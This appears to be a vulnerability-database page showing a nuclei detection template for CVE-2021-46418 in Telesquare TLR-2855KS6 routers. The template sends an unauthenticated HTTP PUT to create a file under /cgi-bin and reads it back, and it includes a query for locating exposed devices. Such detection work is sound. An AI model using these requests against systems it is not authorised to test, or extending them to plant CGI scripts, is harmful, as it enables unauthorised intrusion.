Lucene search
K

Telesquare TLR-2855KS6 - Arbitrary File Creation

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

Telesquare TLR-2855KS6 - Unauthorized File Creation vulnerability via PUT method, allowing CGI script creation

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Telesquare TLR-2855KS6 - Arbitrary File Creation Vulnerability
11 Apr 202200:00
zdt
ATTACKERKB
CVE-2021-46418
7 Apr 202212:15
attackerkb
Circl
CVE-2021-46418
7 Apr 202216:49
circl
CNNVD
Telesquare TLR-2855KS6 安全漏洞
7 Apr 202200:00
cnnvd
CVE
CVE-2021-46418
7 Apr 202211:18
cve
Cvelist
CVE-2021-46418
7 Apr 202211:18
cvelist
Exploit DB
Telesquare TLR-2855KS6 - Arbitrary File Creation
11 Apr 202200:00
exploitdb
NVD
CVE-2021-46418
7 Apr 202212:15
nvd
Packet Storm
Telesquare TLR-2855KS6 Arbitrary File Creation
11 Apr 202200:00
packetstorm
Prion
Design/Logic Flaw
7 Apr 202212:15
prion
Rows per page
id: CVE-2021-46418

info:
  name: Telesquare TLR-2855KS6 - Arbitrary File Creation
  author: DhiyaneshDK
  severity: high
  description: |
    An unauthorized file creation vulnerability in Telesquare TLR-2855KS6 via PUT method can allow creation of CGI scripts.
  impact: |
    Unauthenticated attackers can create arbitrary files including CGI scripts via HTTP PUT requests, potentially achieving remote code execution.
  remediation: |
    Apply firmware updates provided by Telesquare or restrict HTTP PUT access to the device.
  reference:
    - http://packetstormsecurity.com/files/166674/Telesquare-TLR-2855KS6-Arbitrary-File-Creation.html
    - https://github.com/ARPSyndicate/cvemon
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46418
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-46418
    epss-score: 0.23945
    epss-percentile: 0.97562
    cpe: cpe:2.3:h:telesquare:tlr-2855ks6:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: telesquare
    product: "tlr-2855ks6"
    fofa-query: "product==\"TELESQUARE-TLR-2855KS6\""
  tags: packetstorm,cve,cve2021,telesquare,intrusive,vuln
variables:
  filename: "{{rand_base(6)}}"

http:
  - raw:
      - |
        PUT /cgi-bin/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

        {{randstr}}
      - |
        GET /cgi-bin/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 201'
          - 'contains(server_1, "lighttpd") && contains(content_type_2, "text/plain")'
          - 'contains(body_2, "{{randstr}}")'
        condition: and
# digest: 4b0a004830460221009193a9d8065db01efc9321e07fa8d7a753d8e14cfda838296f6f3acaf968e28f022100d19c7c3e3f13bb035545a77ec22ed352a0653ffefaddafe48734567cbc918f9d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.23945
32